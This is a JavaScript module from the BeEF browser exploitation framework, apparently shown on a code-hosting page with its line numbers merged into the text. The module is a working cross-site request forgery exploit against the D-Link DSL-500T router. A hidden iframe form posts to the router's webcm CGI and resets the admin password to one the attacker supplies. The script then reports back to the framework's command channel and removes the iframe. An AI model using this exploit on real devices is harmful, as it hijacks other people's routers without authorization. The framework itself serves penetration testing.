Path: blob/master/modules/exploits/router/dlink_dsl500t_csrf/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var gateway = '<%= @base %>';8var passwd = '<%= @password %>';9var timeout = 15;1011var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", "application/x-www-form-urlencoded",12[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,13{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},14{'type':'hidden', 'name':'security:settings/password', 'value':passwd},15{'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},16{'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}17]);1819beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");2021cleanup = function() {22document.body.removeChild(dsl500t_iframe_<%= @command_id %>);23}24setTimeout("cleanup()", timeout*1000);2526});27282930